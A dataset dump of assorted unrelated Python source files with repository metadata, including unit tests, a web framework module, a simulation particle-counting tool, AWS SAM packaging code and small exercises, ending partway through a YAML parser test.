self.assertEqual(razdalja_koordinat(0, 0, 1, 0), 1)
self.assertEqual(razdalja_koordinat(0, 0, 0, 1), 1)
self.assertEqual(razdalja_koordinat(0, 0, -1, 0), 1)
self.assertEqual(razdalja_koordinat(0, 0, 0, -1), 1)
self.assertEqual(razdalja_koordinat(1, 0, 0, 0), 1)
self.assertEqual(razdalja_koordinat(0, 1, 0, 0), 1)
self.assertEqual(razdalja_koordinat(-1, 0, 0, 0), 1)
self.assertEqual(razdalja_koordinat(0, -1, 0, 0), 1)
self.assertEqual(razdalja_koordinat(1, 2, 4, 6), 5)
self.assertEqual(razdalja_koordinat(1, 2, -2, 6), 5)
self.assertEqual(razdalja_koordinat(1, 2, 4, -2), 5)
self.assertEqual(razdalja_koordinat(1, 2, -2, -2), 5)
from math import sqrt
self.assertAlmostEqual(razdalja_koordinat(1, 2, 0, 1), sqrt(2))
def test_3_razdalja_krajev(self):
kraji = [
('Breลพice', 10, 20),
('Lenart', 13, 24),
('Rateฤe', 17, 20),
('Ljutomer', 8, 36)
]
from math import sqrt
self.assertEqual(razdalja("Breลพice", "Lenart", kraji), 5)
self.assertEqual(razdalja("Lenart", "Breลพice", kraji), 5)
self.assertEqual(razdalja("Breลพice", "Rateฤe", kraji), 7)
self.assertAlmostEqual(razdalja("Lenart", "Rateฤe", kraji), sqrt(32))
self.assertEqual(razdalja("Lenart", "Ljutomer", kraji), 13)
koordinate.call_count = razdalja_koordinat.call_count = 0
razdalja("Breลพice", "Lenart", kraji)
self.assertEqual(
koordinate.call_count, 2,
"Funkcija `razdalja` mora dvakrat poklicati `koordinate`")
self.assertEqual(
razdalja_koordinat.call_count, 1,
"Funkcija `razdalja` mora enkrat poklicati `razdalja`")
def test_4_v_dometu(self):
kraji = [
('Lenart', 13, 24),
('Breลพice', 10, 20), # Lenart <-> Breลพice = 5
('Rateฤe', 17, 20), # Lenart <-> Rateฤe = 5.66
('Ljutomer', 8, 36) # Lenart <-> Ljutomer = 13
]
self.assertEqual(v_dometu("Lenart", 5, kraji), ["Breลพice"])
self.assertEqual(v_dometu("Lenart", 3, kraji), [])
self.assertEqual(set(v_dometu("Lenart", 6, kraji)), {"Breลพice", "Rateฤe"})
kraji = self.vsi_kraji
self.assertEqual(set(v_dometu("Ljubljana", 20, kraji)), {'Vrhnika', 'Domลพale', 'Kamnik', 'ล kofja Loka'})
def test_5_najbolj_oddaljeni(self):
kraji = [
('Lenart', 13, 24),
('Breลพice', 10, 20), # Lenart <-> Breลพice = 5
('Rateฤe', 17, 20), # Lenart <-> Rateฤe = 5.66
('Ljutomer', 8, 36) # Lenart <-> Ljutomer = 13
]
self.assertEqual(najbolj_oddaljeni("Lenart", ["Breลพice", "Rateฤe"], kraji), "Rateฤe")
self.assertEqual(najbolj_oddaljeni("Lenart", ["Breลพice"], kraji), "Breลพice")
kraji = self.vsi_kraji
self.assertEqual(najbolj_oddaljeni("Ljubljana", ["Domลพale", "Kranj", "Maribor", "Vrhnika"], kraji), "Maribor")
def test_6_zalijemo(self):
self.assertEqual(zalijemo("Ljubljana", 30, self.vsi_kraji), "Cerknica")
def test_7_presek(self):
self.assertEqual(presek([1, 5, 2], [3, 1, 4]), [1])
self.assertEqual(presek([1, 5, 2], [3, 0, 4]), [])
self.assertEqual(presek([1, 5, 2], []), [])
self.assertEqual(presek([], [3, 0, 4]), [])
self.assertEqual(presek([], []), [])
self.assertEqual(set(presek([1, 5, 2], [2, 0, 5])), {2, 5})
self.assertEqual(presek(["Ana", "Berta", "Cilka"], ["Cilka", "Dani", "Ema"]), ["Cilka"])
def test_8_skupno_zalivanje(self):
self.assertEqual(set(skupno_zalivanje("Bled", "Ljubljana", 30, self.vsi_kraji)),
{"Kranj", "ล kofja Loka"})
if __name__ == "__main__":
unittest.main()
'''''' | [
"[email protected]"
] | |
bc291688aa3ce741509d6240563d380a29e2dd1a | 62d6a37e1fb1b224b53e14a1cf151ef0571aa20f | /orun/http/__init__.py | 5d27eb7d2410dda8fe4263aa9eb1974206200fbe | [] | no_license | katrid/orun | 4fa0f291a1ef43f16bc1857a170fc0b2e5e06739 | bfc6dae06182124ba75b1f3761d81ba8ca387dea | refs/heads/master | 2023-08-30T03:58:34.570527 | 2023-08-09T04:05:30 | 2023-08-09T04:05:30 | 66,562,767 | 14 | 4 | null | 2023-01-06T22:29:37 | 2016-08-25T14:01:44 | Python | UTF-8 | Python | false | false | 1,004 | py | from orun.http.cookie import SimpleCookie, parse_cookie
from orun.http.request import (
HttpRequest, QueryDict, RawPostDataException, UnreadablePostError,
)
from orun.http.response import (
BadHeaderError, FileResponse, Http404, HttpResponse,
HttpResponseBadRequest, HttpResponseForbidden, HttpResponseGone,
HttpResponseNotAllowed, HttpResponseNotFound, HttpResponseNotModified,
HttpResponsePermanentRedirect, HttpResponseRedirect,
HttpResponseServerError, JsonResponse, StreamingHttpResponse,
)
__all__ = [
'SimpleCookie', 'parse_cookie', 'HttpRequest', 'QueryDict',
'RawPostDataException', 'UnreadablePostError',
'HttpResponse', 'StreamingHttpResponse', 'HttpResponseRedirect',
'HttpResponsePermanentRedirect', 'HttpResponseNotModified',
'HttpResponseBadRequest', 'HttpResponseForbidden', 'HttpResponseNotFound',
'HttpResponseNotAllowed', 'HttpResponseGone', 'HttpResponseServerError',
'Http404', 'BadHeaderError', 'JsonResponse', 'FileResponse',
]
| [
"[email protected]"
] | |
2f2e173cedfb3e0b03918438536ae26ad4faaab9 | 2ca998dd8361984c4d4312f80b0c4ff67fcc84f4 | /mid2names.py | 24c72dac715ed35ecb5f14d4fefbc984ac4b12ae | [] | no_license | rohitpatwa/dbExtend | 31a7f1935d240595bc10f3d3641c7d051abf2047 | dad7de67141edc3d7353c5f1762a8786b9e3b997 | refs/heads/master | 2022-03-31T04:16:06.719265 | 2020-01-22T23:28:20 | 2020-01-22T23:28:20 | 235,421,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | """Create LUT from a given db
Script to create a LUT table with FID.MID as the keys and English names as values. The script assumes the file structure
to be F0001/MID1 for all FIDs. It then reads all the mid.csv files in the MID? folders and append them to a dataframe.
The purpose of this script is to prepare FIW for finding overlapping names across other datasets.
"""
import glob
import re
from tqdm import tqdm
import pandas as pd
def clean_name(name):
""" Cleans a given input name.
Args:
name: input name
Returns:
cleaned name
"""
# TODO: implement this method
pass
def import_fiw_names(path):
""" Create a LUT from all the names of the db
Args:
path: Path to the folder containing FIDs
Returns:
Saves a file with the name FIW_LUT.csv.
Returns dataframe of FIW_LUT
"""
# make sure the path ends with a '/'
if not re.search(r'\/$', path):
path += '/'
# read all the paths matching the given format
paths = sorted(glob.glob(path + 'F????/mid.csv'))
df = pd.DataFrame(
columns=['source_db', 'fid', 'mid', 'gender', 'first', 'first_alias', 'last', 'last_alias', 'name'])
# Read a csv file which contains last names of all the FIDs
last_name_file_path = '/'.join(path.split('/')[:-2]) + '/FIW_FIDs.csv'
last_name_df = pd.read_csv(last_name_file_path)
for p in tqdm(paths):
# Extract fid from path
fid = re.sub(r'.*(F\d{4}).*', r'\1', p)
d = pd.read_csv(p)
# this check is applied because a few families are missing in last_name_df. it will be fixed in future
if fid in last_name_df['fid'].values:
last = last_name_df.query('fid==@fid').iloc[0]['surname'].split('.')[0]
else:
last = ''
# TODO: Develop a way to get aliases
for i in d.index:
first, mid, gender = d.loc[i, ['Name', 'MID', 'Gender']]
first_alias = '' # alias
last_alias = '' # to be fetched
name = ' '.join([first, last]).strip()
df.loc[len(df)] = ['FIW', fid, mid, gender, first, first_alias, last, last_alias, name.lower()]
df.to_csv('FIW_LUT.csv', index=False)
return df
def import_family101_names(path):
"""Create a LUT for Family101 db
Args:
path: path to the FAMILY101.txt file
Returns:
Saves a file with the name Family101_LUT.csv.
returns a dataframe with all the names from family101 db
"""
# open the file containing family101 names
f = open(path)
df = pd.DataFrame(columns=['source_db', 'name', 'gender', 'relation', 'first', 'last', 'family_name'])
for row in tqdm(f.readlines()):
row = re.sub(r'\n', '', row)
if row:
# Each row has a structure "1 HUSB Barac_Obama"
row_split = row.split()
relation, name = row_split[1], row_split[2].replace('_', ' ')
# These rows are not of any use, they just mention the family surname
if relation == 'FAMI':
family_name = name
else:
name_split = name.split()
first, last = '', ''
if len(name_split) > 1:
first, last = name_split[0], name_split[-1]
# There are only 4 relations ["HUSB", "WIFE", "SONN", "DAUG"]
if relation == 'HUSB' or relation == 'SONN':
gender = 'm'
else:
gender = 'f'
df.loc[len(df)] = 'family101', name.lower(), gender, relation, first, last, family_name
df.to_csv('Family101_LUT.csv', index=False)
return df
# Testing code
import sys
if __name__ == "__main__":
p = sys.argv[1]
import_fiw_names(p)
import_family101_names(p)
| [
"[email protected]"
] | |
3784205655c4e6b4cfa9c7dfccd811231c871938 | ac15eda44e8dcfee6dff62f514c5b98a3382f50d | /python/les5/les5_3.py | f7632dd52e6ce6a4948be0711a402c746542fd4a | [] | no_license | yangruihan/raspberrypi | 5789c1a2e72d4012d46563d0644b08d032d346e6 | 22bc1a06b25e129a4314f4bc9cec5112affda136 | refs/heads/master | 2022-12-27T09:27:05.102020 | 2020-10-13T09:41:24 | 2020-10-13T09:41:24 | 32,977,936 | 4 | 0 | null | 2022-12-16T01:47:53 | 2015-03-27T09:30:43 | Java | UTF-8 | Python | false | false | 232 | py | #!/usr/bin/env python3
import pickle
with open('mydata.pickle', 'wb') as mysavedata:
pickle.dump([1, 2, 'three'], mysavedata)
with open('mydata.pickle', 'rb') as myrestoredata:
a_list = pickle.load(myrestoredata)
print(a_list)
| [
"[email protected]"
] | |
40b8cf0d6ea7ccb94390214e6f73406717a8998d | 91c702af361deb5301c7f7f420cd09383480878a | /gastrack/countParticles.py | 96964c3c5d77fd8cb72f3571512a9ffa907b5b13 | [
"MIT",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | myinxd/gastrack | 88baff1972d21c48cfd5419a0f6136b029c7e28b | da2f7390eace2ba231f6d3b28968be0ca7331a44 | refs/heads/master | 2021-01-12T11:44:49.618338 | 2017-11-24T01:17:37 | 2017-11-24T01:17:37 | 72,290,045 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,510 | py | # !/usr/bin/python3
# Copyright (C) 2016 Zhixian MA <[email protected]>
"""
A tool to count amont of particles in the provided regions.
"""
import os
import sys
import re
import h5py
import numpy as np
import utils
class Cluster:
"""
The cluster class
Parameters
----------
filepath: string
File path of the snap.
clstype: string
Major or minor cluster, can be 'maj' or 'min'.
numhalo: int
Number of halo particles in the major cluster.
numgas: int
Number of gas particles in the major cluster.
Methods
-------
load_hdf5: load file
get_idx: get indices of the cluster according to its type.
get_particles: get particles in the cluster.
"""
def __init__(self, filepath, clstype, numhalo, numgas):
self.numhalo = numhalo
self.numgas = numgas
self.clstype = clstype
self.filepath = filepath
self.unit_len = 3.08568E21 # [cm]
self.cm2Mpc = 3.240779289469756E-25
# Open file
try:
self.load_hdf5()
except IOError:
print('File does not exist.')
return
def load_hdf5(self):
"""Open file"""
self.filepart = h5py.File(self.filepath, 'r')
def get_idx(self):
"""Get indices of the cluster"""
# Init
gas_group = self.filepart['PartType0']
halo_group = self.filepart['PartType1']
gas_id = np.array(gas_group['ParticleIDs'])
halo_id = np.array(halo_group['ParticleIDs'])
# judge cluster
if self.clstype == 'maj':
# major cluster
self.gasidx = gas_id <= self.numgas
self.haloidx = halo_id <= self.numhalo + len(gas_id)
self.gas_id = gas_id[self.gasidx]
self.halo_id = halo_id[self.haloidx]
elif self.clstype == 'min':
# minor cluster
self.gasidx = gas_id > self.numgas
self.haloidx = halo_id > self.numhalo + len(gas_id)
self.gas_id = gas_id[self.gasidx]
self.halo_id = halo_id[self.haloidx]
def get_particles(self):
"""
Get the cords and data
Output
------
cords: np.ndarray
coordinates of the particles
data: np.ndarray
data with repect to the field
"""
# Get indices
self.get_idx()
# Get cords and fields
# gas
gas_group = self.filepart['PartType0']
# coordinates
cords = np.array(gas_group['Coordinates'])
self.gas_cords = cords[self.gasidx, :] * self.unit_len * self.cm2Mpc
# field
data = np.array(gas_group['Density'])
self.gas_den = data[self.gasidx]
# halo
halo_group = self.filepart['PartType1']
# coordinates
cords = np.array(halo_group['Coordinates'])
self.halo_cords = cords[self.haloidx, :] * self.unit_len * self.cm2Mpc
# field
data = np.array(halo_group['Masses'])
self.halo_den = data[self.haloidx]
def get_cls(filepath, numhalo, numgas):
"""Get clusters
Parameters
----------
filepath: string
File path of the snap.
numhalo: int
Number of halo particles in the major cluster.
numgas: int
Number of gas particles in the major cluster.
Output
------
maj_cls: Cluster object
The major cluster.
min_cls: Cluster object
The minor cluster.
"""
# Get clusters
maj_cls = Cluster(filepath, 'maj', numhalo, numgas)
min_cls = Cluster(filepath, 'min', numhalo, numgas)
maj_cls.get_particles()
min_cls.get_particles()
return maj_cls, min_cls
def get_peak(maj_cls, step=0.005):
"""
Generate maps, find peaks and save result.
Parameters
----------
maj_cls: Cluster object
The major cluster
step: double
Step or width of the cubic for generating mosaic projection map.
Output
------
peak: list
Coordinate of the peak in the projected map.
"""
halo_z = utils.gen_mosaic(maj_cls.halo_cords, maj_cls.halo_den, step, 'z')
peak_z = utils.get_peaks(halo_z, step)
# y direction
halo_y = utils.gen_mosaic(maj_cls.halo_cords, maj_cls.halo_den, step, 'y')
peak_y = utils.get_peaks(halo_y, step)
# x direction
halo_x = utils.gen_mosaic(maj_cls.halo_cords, maj_cls.halo_den, step, 'x')
peak_x = utils.get_peaks(halo_x, step)
# Combine
x = (peak_z[1] + peak_y[1]) / 2
y = (peak_z[2] + peak_x[1]) / 2
z = (peak_x[2] + peak_y[2]) / 2
peak = [x, y, z]
return peak
def calc_particles(maj_cls, min_cls, peak, reg_mode, reg_params):
"""
Calculate amount of particles in the provided region
Parameters
----------
reg_mode: string
Mode of the region, can be 'cir' or 'elp'
reg_params: list
Parameters of the region
"""
# Init
part_total = 0
part_maj = 0
part_min = 0
# Calc particles
if reg_mode == 'cir':
# parmaters
x_c = peak[0]
y_c = peak[1]
z_c = peak[2]
radius = reg_params
# maj
maj_x = maj_cls.gas_cords[:, 0] - x_c
maj_y = maj_cls.gas_cords[:, 1] - y_c
maj_z = maj_cls.gas_cords[:, 2] - z_c
# maj_z = maj_cls.gas_cords[:,2]
maj_dist = np.sqrt(maj_x**2 + maj_y**2 + maj_z**2)
maj_idx = maj_dist <= radius
part_maj = maj_idx.sum()
# min
min_x = min_cls.gas_cords[:, 0] - x_c
min_y = min_cls.gas_cords[:, 1] - y_c
min_z = min_cls.gas_cords[:, 2] - z_c
# min_z = min_cls.gas_cords[:,2]
min_dist = np.sqrt(min_x**2 + min_y**2 + min_z**2)
min_idx = min_dist <= radius
part_min = min_idx.sum()
# sum
part_total = part_maj + part_min
elif reg_mode == 'sec':
# parmaters
x_c = peak[0]
y_c = peak[1]
z_c = peak[2]
radius_low = reg_params[0]
radius_high = reg_params[1]
angle_low = reg_params[2]
angle_high = reg_params[3]
if angle_low >= 2 * np.pi:
angle_low -= 2 * np.pi
angle_high -= 2 * np.pi
if angle_high > 2 * np.pi:
angle_low = [angle_low, 0]
angle_high = [2 * np.pi, angle_high - 2 * np.pi]
else:
angle_low = [angle_low]
angle_high = [angle_high]
maj_idx = np.zeros(maj_cls.gas_id.shape)
maj_idx = maj_idx.astype(bool)
min_idx = np.zeros(min_cls.gas_id.shape)
min_idx = min_idx.astype(bool)
for i in range(len(angle_low)):
# maj
maj_x = maj_cls.gas_cords[:, 0] - x_c
maj_y = maj_cls.gas_cords[:, 1] - y_c
maj_z = maj_cls.gas_cords[:, 2] - z_c
# maj_z = maj_cls.gas_cords[:,2]
maj_dist = np.sqrt(maj_x**2 + maj_y**2 + maj_z**2)
maj_ang = np.arcsin(np.abs(maj_y) / maj_dist)
maj_idx_dist = (maj_dist <= radius_high) * (maj_dist >= radius_low)
# Quarant1
idx_q1 = (maj_x >= 0) * (maj_y >= 0)
idx_ang1 = (maj_ang <= angle_high[i]) * (maj_ang >= angle_low[i])
# Quarant2
idx_q2 = (maj_x < 0) * (maj_y >= 0)
idx_ang2 = ((np.pi - maj_ang) <=
angle_high[i]) * ((np.pi - maj_ang) >= angle_low[i])
# Quarant3
idx_q3 = (maj_x < 0) * (maj_y < 0)
idx_ang3 = ((np.pi + maj_ang) <=
angle_high[i]) * ((np.pi + maj_ang) >= angle_low[i])
# Quarant4
idx_q4 = (maj_x >= 0) * (maj_y <= 0)
idx_ang4 = ((2 * np.pi - maj_ang) <=
angle_high[i]) * ((2 * np.pi - maj_ang) >= angle_low[i])
# Combine idx
maj_idx_t = (idx_ang1 * idx_q1) + (idx_ang2 * idx_q2) + \
(idx_ang3 * idx_q3) + (idx_ang4 * idx_q4)
maj_idx_t = (maj_idx_dist) * (maj_idx_t)
maj_idx = maj_idx + maj_idx_t
part_maj += maj_idx_t.sum()
# min
min_x = min_cls.gas_cords[:, 0] - x_c
min_y = min_cls.gas_cords[:, 1] - y_c
min_z = min_cls.gas_cords[:, 2] - z_c
min_dist = np.sqrt(min_x**2 + min_y**2 + min_z**2)
min_ang = np.arcsin(np.abs(min_y) / min_dist)
min_idx_dist = (min_dist <= radius_high) * (min_dist >= radius_low)
# Quarant1
idx_q1 = (min_x >= 0) * (min_y >= 0)
idx_ang1 = (min_ang <= angle_high[i]) * (min_ang >= angle_low[i])
# Quarant2
idx_q2 = (min_x < 0) * (min_y >= 0)
idx_ang2 = ((np.pi - min_ang) <=
angle_high[i]) * ((np.pi - min_ang) >= angle_low[i])
# Quarant3
idx_q3 = (min_x < 0) * (min_y < 0)
idx_ang3 = ((np.pi + min_ang) <=
angle_high[i]) * ((np.pi + min_ang) >= angle_low[i])
# Quarant4
idx_q4 = (min_x >= 0) * (min_y <= 0)
idx_ang4 = ((2 * np.pi - min_ang) <=
angle_high[i]) * ((2 * np.pi - min_ang) >= angle_low[i])
# Combine idx
min_idx_t = (idx_ang1 * idx_q1) + (idx_ang2 * idx_q2) + \
(idx_ang3 * idx_q3) + (idx_ang4 * idx_q4)
min_idx_t = (min_idx_dist) * (min_idx_t)
min_idx = min_idx + min_idx_t
part_min += min_idx_t.sum()
# sum
part_total = part_maj + part_min
else:
print("Mode %s is not supported at present" % reg_mode)
partlist = [part_total, part_maj, part_min]
return partlist, maj_idx, min_idx
def main(argv):
"""The main method"""
# Init
file1 = argv[1]
file2 = argv[2]
# get id
snapid1 = re.findall(r'[0-9][0-9][0-9]', file1)
snapid1 = int(snapid1[0])
snapid2 = re.findall(r'[0-9][0-9][0-9]', file2)
snapid2 = int(snapid2[0])
outpath = argv[3]
# Init of parameters
numhalo = int(argv[4]) # 734866
numgas = int(argv[5]) # 704860
step = 0.01
# get cls of file1
maj_cls_f1, min_cls_f1 = get_cls(file1, numhalo, numgas)
# get cls of file2
maj_cls_f2, min_cls_f2 = get_cls(file2, numhalo, numgas)
# get peak
peak1 = get_peak(maj_cls_f1, step)
peak2 = get_peak(maj_cls_f2, step)
# Calc particles of file2
print('Searching for particles at %.2f Gyr ...' % (snapid2 * 0.02))
part_ori, maj_idx_f2, min_idx_f2 = calc_particles(maj_cls_f2,
min_cls_f2,
peak2, 'cir', 50 / 1000)
print('Total particles at %.2f Gyr: %d' % (snapid2 * 0.02, part_ori[0]))
print('Major particles at %.2f Gyr: %d' % (snapid2 * 0.02, part_ori[1]))
print('Minor particles at %.2f Gyr: %d' % (snapid2 * 0.02, part_ori[2]))
# Calc particles of file1
# calc circles
print('Searching for particles in the circular region at %.2f Gyr...'
% (snapid1 * 0.02))
reg_mode = 'sec'
reg_params = [float(argv[6]), float(argv[7]),
float(argv[8]) / 180 * np.pi,
float(argv[9]) / 180 * np.pi]
part_sec, maj_idx_c, min_idx_c = calc_particles(
maj_cls_f1, min_cls_f1, peak1, reg_mode, reg_params)
print('Total particles at %.2f Gyr: %d' % (snapid1 * 0.02, part_sec[0]))
print('Major particles at %.2f Gyr: %d' % (snapid1 * 0.02, part_sec[1]))
print('Minor particles at %.2f Gyr: %d' % (snapid1 * 0.02, part_sec[2]))
# diff
part_maj_c = utils.cmp_id(maj_cls_f1, maj_cls_f2, maj_idx_c, maj_idx_f2)
print('Major particles from %.2f Gyr: %d' % (snapid2 * 0.02, part_maj_c))
part_min_c = utils.cmp_id(min_cls_f1, min_cls_f2, min_idx_c, min_idx_f2)
print('Minor particles from %.2f Gyr: %d' % (snapid2 * 0.02, part_min_c))
# save
# filename = os.path.join(outdir,'particles.txt')
filename = outpath
if os.path.exists(filename):
os.remove(filename)
f = open(filename, 'a')
else:
f = open(filename, 'a')
f.write("Particles at %0.2f Gyr.\n" % (snapid2 * 0.02))
f.write('Total particles at %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_ori[0]))
f.write('Major particles at %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_ori[1]))
f.write('Minor particles at %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_ori[2]))
f.write('\n')
f.write("Particles at %0.2f Gyr in the section region.\n" %
(snapid1 * 0.02))
f.write('Total particles at %.2f Gyr: %d\n' %
(snapid1 * 0.02, part_sec[0]))
f.write('Major particles at %.2f Gyr: %d\n' %
(snapid1 * 0.02, part_sec[1]))
f.write('Minor particles at %.2f Gyr: %d\n' %
(snapid1 * 0.02, part_sec[2]))
f.write('Major particles from %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_maj_c))
f.write('Minor particles from %.2f Gyr: %d\n' %
(snapid2 * 0.02, part_min_c))
f.close()
if __name__ == "__main__":
main(sys.argv)
| [
"[email protected]"
] | |
8b51fa52d6cef1d961cb8e29185932c1f2371400 | a95a398f7f1e4306367f22ff59a9da72a8c23b46 | /course-files/lectures/lecture_04/07_activity.py | c4bf8d853793765bb768a13eb6186ba70431a59a | [] | no_license | eecs110/spring2020 | 74ff8a317cf009aa727ad46e143e1c6619c83086 | a726d32c5eb418f4bf0fe27fae1f6479e4ae8140 | refs/heads/master | 2022-10-18T21:58:19.690897 | 2020-06-03T01:04:20 | 2020-06-03T01:04:20 | 251,242,896 | 0 | 0 | null | 2022-10-06T10:22:24 | 2020-03-30T08:17:53 | Python | UTF-8 | Python | false | false | 445 | py | from operator import add, mul, sub, truediv, mod, floordiv, pow
# for more info, see the docs: https://docs.python.org/3/library/operator.html
# Challenge: Create a custom function called "hypotenuse" that calculates
# the hypotenuse of any triangle. Then, invoke that function using the
# following triangle dimensions:
# triangle 1: side_a = 5, side_b = 12
# triangle 2: side_a = 3, side_b = 5
# triangle 3: side_a = 4, side_b = 4 | [
"[email protected]"
] | |
07d6d0d03eb9241e5ed49723bdf77dc4844cac19 | d07f4cd12b40fb4e009b4e36c4d8c0b42b35768d | /chalice/package.py | 642f4878836bd056bc1932395c3295c4d75224c8 | [
"Apache-2.0"
] | permissive | birkoff/chalice | b865d17d085dc92842da09d82033411001a2e01c | 83ffea3773519a26bf1c72ef48b33c149ccdcc2f | refs/heads/master | 2021-01-21T20:56:46.260466 | 2017-05-23T17:03:40 | 2017-05-23T17:03:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,897 | py | import os
import copy
import json
import hashlib
from typing import Any, Dict # noqa
from chalice import __version__ as chalice_version
from chalice.deploy.swagger import CFNSwaggerGenerator
from chalice.deploy.swagger import SwaggerGenerator # noqa
from chalice.deploy.packager import LambdaDeploymentPackager
from chalice.deploy.deployer import ApplicationPolicyHandler
from chalice.utils import OSUtils
from chalice.config import Config # noqa
from chalice.app import Chalice # noqa
from chalice.policy import AppPolicyGenerator
def create_app_packager(config):
# type: (Config) -> AppPackager
osutils = OSUtils()
# The config object does not handle a default value
# for autogen'ing a policy so we need to handle this here.
return AppPackager(
# We're add place holder values that will be filled in once the
# lambda function is deployed.
SAMTemplateGenerator(
CFNSwaggerGenerator('{region}', '{lambda_arn}'),
PreconfiguredPolicyGenerator(
config,
ApplicationPolicyHandler(
osutils, AppPolicyGenerator(osutils)))),
LambdaDeploymentPackager()
)
class PreconfiguredPolicyGenerator(object):
def __init__(self, config, policy_gen):
# type: (Config, ApplicationPolicyHandler) -> None
self._config = config
self._policy_gen = policy_gen
def generate_policy_from_app_source(self):
# type: () -> Dict[str, Any]
return self._policy_gen.generate_policy_from_app_source(
self._config)
class SAMTemplateGenerator(object):
_BASE_TEMPLATE = {
'AWSTemplateFormatVersion': '2010-09-09',
'Transform': 'AWS::Serverless-2016-10-31',
'Outputs': {
'RestAPIId': {
'Value': {'Ref': 'RestAPI'},
},
'APIHandlerName': {
'Value': {'Ref': 'APIHandler'},
},
'APIHandlerArn': {
'Value': {'Fn::GetAtt': ['APIHandler', 'Arn']}
},
'EndpointURL': {
'Value': {
'Fn::Sub': (
'https://${RestAPI}.execute-api.${AWS::Region}'
# The api_gateway_stage is filled in when
# the template is built.
'.amazonaws.com/%s/'
)
}
}
}
} # type: Dict[str, Any]
def __init__(self, swagger_generator, policy_generator):
# type: (SwaggerGenerator, PreconfiguredPolicyGenerator) -> None
self._swagger_generator = swagger_generator
self._policy_generator = policy_generator
def generate_sam_template(self, config, code_uri='<placeholder>'):
# type: (Config, str) -> Dict[str, Any]
template = copy.deepcopy(self._BASE_TEMPLATE)
resources = {
'APIHandler': self._generate_serverless_function(config, code_uri),
'RestAPI': self._generate_rest_api(
config.chalice_app, config.api_gateway_stage),
}
template['Resources'] = resources
self._update_endpoint_url_output(template, config)
return template
def _update_endpoint_url_output(self, template, config):
# type: (Dict[str, Any], Config) -> None
url = template['Outputs']['EndpointURL']['Value']['Fn::Sub']
template['Outputs']['EndpointURL']['Value']['Fn::Sub'] = (
url % config.api_gateway_stage)
def _generate_serverless_function(self, config, code_uri):
# type: (Config, str) -> Dict[str, Any]
properties = {
'Runtime': config.lambda_python_version,
'Handler': 'app.app',
'CodeUri': code_uri,
'Events': self._generate_function_events(config.chalice_app),
'Policies': [self._generate_iam_policy()],
'Tags': self._function_tags(config),
}
if config.environment_variables:
properties['Environment'] = {
'Variables': config.environment_variables
}
return {
'Type': 'AWS::Serverless::Function',
'Properties': properties,
}
def _function_tags(self, config):
# type: (Config) -> Dict[str, str]
tag = 'version=%s:stage=%s:app=%s' % (chalice_version,
config.chalice_stage,
config.app_name)
return {'aws-chalice': tag}
def _generate_function_events(self, app):
# type: (Chalice) -> Dict[str, Any]
events = {}
for _, view in app.routes.items():
for http_method in view.methods:
key_name = ''.join([
view.view_name, http_method.lower(),
hashlib.md5(
view.view_name.encode('utf-8')).hexdigest()[:4],
])
events[key_name] = {
'Type': 'Api',
'Properties': {
'Path': view.uri_pattern,
'RestApiId': {'Ref': 'RestAPI'},
'Method': http_method.lower(),
}
}
return events
def _generate_rest_api(self, app, api_gateway_stage):
# type: (Chalice, str) -> Dict[str, Any]
swagger_definition = self._swagger_generator.generate_swagger(app)
properties = {
'StageName': api_gateway_stage,
'DefinitionBody': swagger_definition,
}
return {
'Type': 'AWS::Serverless::Api',
'Properties': properties,
}
def _generate_iam_policy(self):
# type: () -> Dict[str, Any]
return self._policy_generator.generate_policy_from_app_source()
class AppPackager(object):
def __init__(self,
sam_templater, # type: SAMTemplateGenerator
lambda_packager, # type: LambdaDeploymentPackager
):
# type: (...) -> None
self._sam_templater = sam_templater
self._lambda_packaager = lambda_packager
def _to_json(self, doc):
# type: (Any) -> str
return json.dumps(doc, indent=2, separators=(',', ': '))
def package_app(self, config, outdir):
# type: (Config, str) -> None
# Deployment package
zip_file = os.path.join(outdir, 'deployment.zip')
self._lambda_packaager.create_deployment_package(
config.project_dir, zip_file)
# SAM template
sam_template = self._sam_templater.generate_sam_template(
config, './deployment.zip')
if not os.path.isdir(outdir):
os.makedirs(outdir)
with open(os.path.join(outdir, 'sam.json'), 'w') as f:
f.write(self._to_json(sam_template))
| [
"[email protected]"
] | |
6a87563d50a56154d56a3e17b55a97e0d205ef9b | aa3dc5ae4fa7d531bbaa75c3008031f2a1b8845d | /1460. Make Two Arrays Equal by Reversing Sub-arrays.py | bf19eb4de403cc17d243c4a1a98166c93118834e | [] | no_license | alankrit03/LeetCode_Solutions | 354e797d1d5f5a78b116c1f9a3034dd651d71d9a | f8ca46afdfbd67509dde63e9cdc5fd178b6f111b | refs/heads/master | 2021-01-08T17:41:22.976375 | 2020-11-03T17:01:37 | 2020-11-03T17:01:37 | 242,097,188 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | class Solution:
def canBeEqual(self, target, arr) -> bool:
from collections import Counter
return Counter(target) == Counter(arr) | [
"[email protected]"
] | |
43f07e970a3ab93ee5c4e86d16c7fc72c4f5b1d9 | 64ff0d2b1f12c321e8fe44d0524bb444820b21f7 | /test/test_parser_yaml.py | 0c77dd18718c76c0ed43fed9d0a856c302417e4d | [
"BSD-2-Clause"
] | permissive | Aniket-Pradhan/python-odml | 8ffd460cd8560b03f439b46b85fc1c78292c6191 | 48e55a264e38829d90f3b8def37e4d2d7b39337f | refs/heads/master | 2020-12-04T11:32:21.717225 | 2020-01-16T06:34:09 | 2020-01-16T16:59:29 | 231,748,290 | 0 | 0 | NOASSERTION | 2020-01-04T10:58:14 | 2020-01-04T10:58:14 | null | UTF-8 | Python | false | false | 1,495 | py | import os
import unittest
import yaml
from odml.tools import dict_parser
from odml.tools.parser_utils import ParserException, InvalidVersionException
class TestYAMLParser(unittest.TestCase):
def setUp(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.basepath = os.path.join(dir_path, "resources")
self.yaml_reader = dict_parser.DictReader()
def test_missing_root(self):
filename = "missing_root.yaml"
message = "Missing root element"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_missing_version(self):
